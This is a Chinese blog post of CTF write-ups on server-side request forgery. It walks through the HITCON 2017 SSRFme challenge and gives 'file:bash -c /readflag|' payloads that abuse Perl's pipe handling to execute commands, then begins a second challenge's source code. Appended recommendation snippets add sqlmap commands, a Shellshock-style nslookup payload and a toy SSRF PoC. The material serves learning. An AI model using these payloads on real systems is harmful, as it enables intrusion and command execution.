SSRF专题-题解

原创 已于 2024-07-17 15:52:09 修改 · 610 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #web安全 #安全 #web

于 2024-06-27 12:56:39 首次发布

SSRF专题-题解(持续更新)


想系统学习一下SSRF,这个专题用来记录自己找的一些SSRF题目

BUUCTF

BUUCTF-[HITCON 2017]SSRFme

题目直接丢了一段代码让审计

120.32.142.100 <?php
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
   
   //检测是否存在X_FORWARDED_FOR头
        $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);//如果存在,将X_FORWARDED_FOR头部拆分成一个数组
        $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];//提取出数组的第一个IP地址
    }//这一段代码的作用总的说就是判断是否存在X_FORWARDED_FOR头部,如果存在,将其中的第一个IP地址取出

    echo $_SERVER["REMOTE_ADDR"];

    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);//将上面获得的ip地址结合一个字符串orange进行md5加密
    @mkdir($sandbox);//基于生成的哈希值在sandbox目录下创建一个子目录
    @chdir($sandbox);//切换到该目录

    $data = shell_exec("GET " . escapeshellarg($_GET["url"]));//使用 shell_exec 执行系统命令 GET 来获取 URL 的内容,并将结果存储在 $data 变量中;
    //escapeshellarg 用于对 $_GET["url"] 进行转义以避免命令注入
    $info = pathinfo($_GET["filename"]);// 获取$_GET["filename"]的路径信息
    $dir  = str_replace(".", "", basename($info["dirname"]));// 去除目录名中的点号,创建目录并更改工作目录
    @mkdir($dir);
    @chdir($dir);
    @file_put_contents(basename($info["basename"]), $data);// 将下载的数据保存到指定的文件中
    highlight_file(__FILE__);// 高亮显示当前PHP文件的源代码

简单来说,这段代码获取用户输入的URL内容,然后将其存入filename对应的位置。
我们先看看根目录有哪些文件

url=/&filename=test

在这里插入图片描述
又一个readflag,应该是要用readflag读取flag。那如何执行呢,这里考到了GET的一个命令执行漏洞。GET使用file协议时候底层会调用perl中的open函数,而perl函数要打开的文件名中如果以管道符(键盘上那个竖杠|)结尾,就会中断原有打开文件操作,并且把这个文件名当作一个命令来执行,并且将命令的执行结果作为这个文件的内容写入。这个命令的执行权限是当前的登录者。如果你执行这个命令,你会看到perl程序运行的结果。
整理一下思路,现在我们需要打开一个文件名是执行readflag命令的文件;没有这个文件所以我们要先创建,创建后访问这个url并将结果存入test文件即可。

url=&filename=bash -c /readflag|
url=file:bash -c /readflag|&filename=test

在这里插入图片描述

BUUCTF-[第二章 web进阶]SSRF Training

点击查看源码
在这里插入图片描述
代码如下:

<?php 
highlight_file(__FILE__);
function check_inner_ip($url) 
{
   
    
    $match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url); 
    if (!$match_result) 
    {
   
    
        die('url fomat error'); 
    } 
    try 
    {
   
    
        $url_parse=parse_url($url); 
    } 
    catch(Exception $e) 
    {
   
    
        die('url fomat error'); 
        return false; 
    } 
    $hostname=$url_parse['host']; 
    $ip=gethostbyname($hostname); 
    $int_ip=ip2long($ip); 
    return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16; 
} 

function safe_request_url($url) 
{
   
    
     
    if (check_inner_ip($url)) 
    {
   
    
        echo $url.' is inner ip'; 
    } 
    else 
    {
   
   
        $ch = curl_init(); 
        curl_setopt($ch, CURLOPT_URL, $url); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
        curl_setopt($ch, CURLOPT_HEADER, 0); 
        $output = curl_exec($ch); 
        $result_info = curl_getinfo($ch); 
        if ($result_info['redirect_url']) 
        {
   
    
            safe_request_url($result_info['redirect_url']); 
        } 
        curl_close($ch); 
        var_dump($output); 
    } 
     
} 

$url = $_GET['url']; 
if(!empty($url)){
   
    
    safe_request_url($url); 
} 

?>

看一看代码执行流程,首先接收一段URL

$url = $_GET['url'];

然后判断,如果URL非空,那么执行safe_request_url函数

<
最低0.47元/天 解锁文章
Wine_Jar
关注
CTFHub_2021-第四届红帽杯网络安全大赛-Web-WebsiteManger
weixin_40872714的博客
03-26 1998
CTFHub_2021-第四届红帽杯网络安全大赛-Web-WebsiteManger(布尔盲注、SSRF ) 场景描述:最新的网站测试器,作为非站长的你,能利用好它的功能吗? 场景打开后,如下,是个登录框 查看源码,发现可能的注入点 /image.php?id=2 布尔盲注 /image.php?id=if(1=1,1,5) True /image.php?id=if(1=2,1,5) False 条件为真时?id=1,回显第一张图片,条件为假时?id=5,没有id=5的图片,什么都没有。即可
CTFhub---WebsiteManger
jiet07的博客
11-09 2810
思路 进入题目:刷新,图片会更新 新建标签页打开,有id参数 使用sqlmap 进行测试
CTFHUB WEBSITE WEBMANAGER 通关
qq_43338937的博客
09-11 522
考点 ssrf 布尔盲注 测试登录页面 username参数位置可以进行布尔盲注 手工测试 a" or sleep(2)--+ 参数使用post提交 保存数据包 利用sqlmap工具进行注入获取数据库 表 用户密码 python3 sqlmap.py -r a.txt --data="username=a&password=a" -p username --curent-db python3 sqlmap.py -r a.txt --data="username=
ctfhub-历年真题web-WebsiteManger
Ewige的博客
07-12 2030
ctfhub 历年真题 webWebsiteManger题目考点解题思路 WebsiteManger 题目考点 布尔盲注 SSRF 解题思路 进行登入点使用sqlmap 测试无果 仔细观察, 图片链接处存在注入点 使用sqlmap进行测试 sqlmap -u "http://challenge-94b51247b7b2ac6f.sandbox.ctfhub.com:10800/image.php?id=3" --tamper space2mysqlblank --technique=B --
CTFHub 信息泄露技能树
qq_43936524的博客
04-20 408
文章目录备份文件下载网站源码bak文件vim缓存.DS_Storegit泄露logslashIndexSVN泄露HG泄露 备份文件下载 网站源码 泄露文件夹为www.zip,解压后得到三个文件 访问Web目录下flag_256061047.txt路径得到flag bak文件 dirsearch扫描结果 vim缓存 当开发人员在线上环境中使用 vim 编辑器,在使用过程中会留下 vim 编辑器缓存,当vim异常退出时,缓存会一直留在服务器上,引起网站源码泄露。 第一次意外退出产生的交换文件名为 .i
精选资源
ssrf-req-filter:在 NodeJS 中发送请求时防止 SSRF 的模块。 阻止对本地和私有 IP 地址的请求
05-31
ssrf-req-filter - 防止 SSRF 攻击 :shield: 服务器端请求伪造 (SSRF) SSRF 是一种攻击媒介,它滥用应用程序与内部/外部网络或机器本身进行交互。 此向量的促成因素之一是 URL 处理不当。 安装 npm install ssrf-...
ssrf-king-main.zip
12-28
SSRF-King是一款专门为BurpSuite设计的插件,其主要功能是自动化检测服务器端请求伪造(SSRF)漏洞。SSRF漏洞是一种安全漏洞,它允许攻击者通过服务器发起对内网的请求。这种漏洞的存在,可能会导致攻击者获取到原本...
精选资源
第三节 SSRF利用 - 内网资源访问-01
09-15
"第三节 SSRF利用 - 内网资源访问-01" 本节课程主要讲解了SSRF漏洞的_php_函数,包括file_get_contents、fsockopen()和curl_exec()三个函数的使用和可能存在的漏洞。 SSRF漏洞的定义 SSRF漏洞全称为Server-side ...
SSRF-labs-master靶场
weixin_68416970的博客
07-30 999
SSRF-labs-master靶场
CTFHUB之Web安全—信息泄露
Lucky小小吴的小屋
10-24 3722
本模块有十道题 目录遍历 phpinfo 备份文件下载(4道) 网站源码 bak文件 vim缓存 .DS_Store Git泄露 SVN泄露 HG泄露
2021第四届红帽杯网络安全大赛-线上赛Writeup
热门推荐
末初 · mochu7
05-10 1万+
记录一下被锤爆的一天…orz。
2021红帽杯 WebsiteManger
LYJ20010728的博客
06-22 868
2021红帽杯 WebsiteManger考点思路Payload 考点 布尔盲注、SSRF 思路 尝试一般的登录方法没得用处,F12查看,登录框没有sql注入的利用点,发现还有一张图片,好家伙,sql注入的利用点在图片上 当id的值为0时没有图片回显,利用布尔盲注得到用户密码:14348d305648989c355433b9a04dffce,用户名为:admin,登录进去一个很明显的ssrf考点 猜测 flag在根目录下:file:///flag Payload 盲注脚本 impo
PortSwigger Academy | Server-side request forgery (SSRF) : 服务器端请求伪造
水榭山寺花烂漫,凤凰集外雁归来。敢与云峰争秀色,妙雨莲花九重开。
01-27 1552
文章目录总结什么是SSRFSSRF攻击有什么影响?常见的SSRF攻击针对服务器本身的SSRF攻击Lab: Basic SSRF against the local serverSSRF攻击其他后端系统Lab: Basic SSRF against another back-end system规避SSRF的常见防御措施具有基于黑名单的输入过滤器的SSRFLab: SSRF with blacklist-based input filter具有基于白名单的输入过滤器的SSRFLab: SSRF with w
SSRF(一):PortSwigger靶场笔记
aaaadoga的博客
07-14 1133
该文章是关于作者在PortSwigger的SSRF靶场训练的记录和学习笔记
第四届红帽杯网络安全大赛 Web 部分writeup
feng的博客
05-09 1万+
前言 记录一下web的wp,随手写的,只会前三题,确实都很简单。 find_it 扫到robots.txt,发现1ndexx.php,直接访问不了,访问.1ndexx.php.swp得到源码,然后读flag: ?code=<?= show_source(glob('./*')[2]); 再访问hack.php: base32解密一下即可得到flag。 framework 是个yii2的框架,扫出来www.zip下载源码,找到了反序列化的路由,yii2的反序列化之前审过了,直接拿POC打: &lt
CTFHub-web详解
shayebudon的博客
11-20 3729
信息泄露 目录遍历 遍历每一个文件夹,找到flag.txt,复制内容提交 PHPINFO 打开页面,从信息中寻找flag。 备份文件下载 网站源码 尝试各种组合,最后发现在网站后添加www.zip后成功下载压缩文件 将解压后的文件名放在url后,即可出现flag bak文件 下载index.php.bak打开即可看到flag vim缓存 当开发人员在线上环境中使用 vim 编辑器,在使用过程中会留下 vim 编辑器缓存,当vim异常退出时,缓存...
【BurpSuite】SSRF | Server-side request forgery (1-5)
m0_71944965的博客
09-10 1223
进入靶场发现是一个登录页面 用admin试试发现登录失败 按靶场提示去检查商品库存并抓包找到url将URL更改为访问管理界面 更改url后将抓包发送到 在Response中找到部分 将delete语句放到url中再放行 回到靶场,下图右上角变为即为成功 访问一个产品,点击“检查库存”,在Burp Suite中拦截请求,并发送给Burp Intruder 清除§ 将将 stockApi 更改为http://192.168.0.1:8080/admin 给数字1增加§:点击Add§ 对ip进行爆破:Pay
【Burpsuit靶场记录】(后续题目更新到主页不同的漏洞专题
asmartrman的博客
02-19 877
Burpsuit靶场记录(手续题目更新到主页不同的漏洞专题
SSRF-bp靶场
qq_53510194的博客
03-26 616
User-agent()输入 { :;/usr/bin/nslookup $(whoami).bp域名 执行命令。1.要求域名必须是stock.weliketoshop.net(常规的请求地址)在另一翻页处(next product),发现类似的path参数,内容为路径。猜测两处公用一个api(stockApi),构造新的stockApi进行测试。@绕过白名单,解码出来的#锁定127.0.0.1。url中的#:<域名>#<位置标识符>url中的@:<用户名>@<域名>找到删除用户的url,改包放包。
Adminer ssrf cve-2021-21311 exp
最新发布
08-26
Adminer是一个轻量级的数据库管理工具,广泛用于Web应用程序中。然而,在其2021年的版本中,发现了一个严重的SSRF(Server Side Request Forgiveness)漏洞,标识为CVE-2021-21311。该漏洞允许攻击者通过精心构造的请求,迫使服务器发起任意网络请求,从而可能导致敏感信息泄露、内部网络探测甚至远程代码执行。 ### 漏洞原理 CVE-2021-21311的成因主要与Adminer的“数据库连接”功能有关。当用户尝试连接到一个数据库时,Adminer会使用提供的主机名和端口来建立连接。如果攻击者能够控制这些参数,并且服务器端未对输入进行严格的过滤和验证,攻击者就可以构造恶意的请求,使服务器访问内部网络资源或执行其他恶意操作。 例如,攻击者可以将主机名设置为`http://127.0.0.1:80`,从而尝试访问本地Web服务,或者更进一步,尝试访问内网中的其他服务。这种攻击方式可以绕过传统的防火墙限制,因为请求是由服务器端发起的,而不是客户端。 ### 漏洞利用示例 以下是一个简单的PoC(Proof of Concept)代码,展示了如何利用CVE-2021-21311漏洞进行SSRF攻击。假设攻击者可以通过某种方式控制Adminer的数据库连接参数,攻击者可以构造一个恶意的请求,迫使服务器访问特定的URL。 ```php <?php // 假设攻击者可以控制$host变量 $host = 'http://127.0.0.1:80'; // 攻击者构造的恶意主机名 // 模拟Adminer的数据库连接逻辑 function connect_to_database($host) { // 使用file_get_contents发起请求,模拟SSRF漏洞 $response = @file_get_contents($host); return $response; } // 调用函数,发起恶意请求 $response = connect_to_database($host); echo $response; ?> ``` 在这个示例中,攻击者通过将`$host`变量设置为`http://127.0.0.1:80`,迫使服务器访问本地Web服务。这可能会导致敏感信息泄露,或者进一步利用内网中的其他服务。 ### 漏洞修复建议 为了防止CVE-2021-21311漏洞的利用,建议采取以下措施: 1. **输入验证**:对用户提供的数据库连接参数进行严格的验证,确保它们符合预期的格式,并且不包含任何可能用于SSRF攻击的特殊字符。 2. **黑名单过滤**:禁止用户输入某些敏感的主机名,如`localhost`、`127.0.0.1`、`0.0.0.0`等,以及常见的内部网络IP地址范围(如`192.168.x.x`、`10.x.x.x`、`172.16.x.x`到`172.31.x.x`)。 3. **使用白名单**:仅允许用户连接到预先定义的、可信的数据库服务器列表,避免用户自由输入主机名和端口。 4. **更新版本**:确保使用的是最新版本的Adminer,官方已经修复了该漏洞。及时更新软件是防止已知漏洞被利用的有效手段。 5. **最小权限原则**:确保Adminer运行在最低权限的账户下,以减少潜在攻击的影响范围。 通过以上措施,可以有效降低CVE-2021-21311漏洞的风险,保护系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值